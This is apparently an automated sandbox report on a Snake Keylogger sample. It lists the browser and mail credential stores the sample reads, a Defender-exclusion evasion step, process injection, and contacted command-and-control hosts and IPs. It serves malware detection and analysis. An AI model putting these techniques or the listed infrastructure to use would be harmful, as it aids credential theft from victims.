            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		111
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Disable or Modify Tools            		LSASS Memory1
            Security Software Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSync1
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc Filesystem13
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482926 Sample: SecuriteInfo.com.Win32.RATX... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 mail.erkanlarofis.com.tr 2->26 28 3 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 44 8 other signatures 2->44 8 SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 process4 file5 22 SecuriteInfo.com.W...20281.29649.exe.log, ASCII 8->22 dropped 46 Adds a directory exclusion to Windows Defender 8->46 48 Injects a PE file into a foreign processes 8->48 12 SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 erkanlarofis.com.tr 77.245.159.7, 49730, 49731, 49732 NIOBEBILISIMHIZMETLERITR Turkey 12->30 32 reallyfreegeoip.org 188.114.97.3, 443, 49710, 49711 CLOUDFLARENETUS European Union 12->32 34 checkip.dyndns.com 158.101.44.242, 49706, 49712, 49714 ORACLE-BMC-31898US United States 12->34 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe29%VirustotalBrowse
            SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe100%AviraHEUR/AGEN.1357443
            SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            erkanlarofis.com.tr0%VirustotalBrowse
            reallyfreegeoip.org0%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            mail.erkanlarofis.com.tr0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.33p0%Avira URL Cloudsafe
            http://checkip.dyndns.orgp0%Avira URL Cloudsafe
            http://erkanlarofis.com.tr0%Avira URL Cloudsafe
            http://mail.erkanlarofis.com.tr0%Avira URL Cloudsafe
            http://mail.erkanlarofis.com.tr0%VirustotalBrowse
            http://erkanlarofis.com.tr0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            erkanlarofis.com.tr
            		77.245.159.7
            		truetrueunknown
            reallyfreegeoip.org
            		188.114.97.3
            		truetrueunknown
            checkip.dyndns.com
            		158.101.44.242
            		truefalseunknown
            mail.erkanlarofis.com.tr
            		unknown
            		unknowntrueunknown
            checkip.dyndns.org
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://checkip.dyndns.org/false
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org/xml/8.46.123.33false
            • URL Reputation: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://checkip.dyndns.orgpSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://reallyfreegeoip.org/xml/8.46.123.33pSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://erkanlarofis.com.trSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://reallyfreegeoip.org/xml/8.46.123.33$SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://checkip.dyndns.org/qSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://reallyfreegeoip.orgSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.orgSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://mail.erkanlarofis.com.trSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://checkip.dyndns.orgSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://checkip.dyndns.comSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org/xml/SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            188.114.97.3
            		reallyfreegeoip.orgEuropean Union
            		13335CLOUDFLARENETUStrue
            158.101.44.242
            		checkip.dyndns.comUnited States
            		31898ORACLE-BMC-31898USfalse
            77.245.159.7
            		erkanlarofis.com.trTurkey
            		42868NIOBEBILISIMHIZMETLERITRtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1482926
            Start date and time:2024-07-26 11:38:11 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/6@3/3
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 105
            • Number of non-executed functions: 13
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            05:38:57API Interceptor3856366x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe modified
            05:38:59API Interceptor10x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            188.114.97.3RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
            • tny.wtf/
            #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
            • tny.wtf/4Gs
            Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
            • downloaddining2.com/h9fmdW6/index.php
            Quotation.exeGet hashmaliciousFormBookBrowse
            • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
            LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
            • www.whatareyoucraving.com/drbb/
            AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
            • tny.wtf/pqv2p
            AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
            • tny.wtf/pqv2p
            AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
            • tny.wtf/pqv2p
            PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
            • tny.wtf/vMCQY
            LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
            • cccc.yiuyiu.xyz/config.ini
            158.101.44.242New order.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • checkip.dyndns.org/
            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • checkip.dyndns.org/
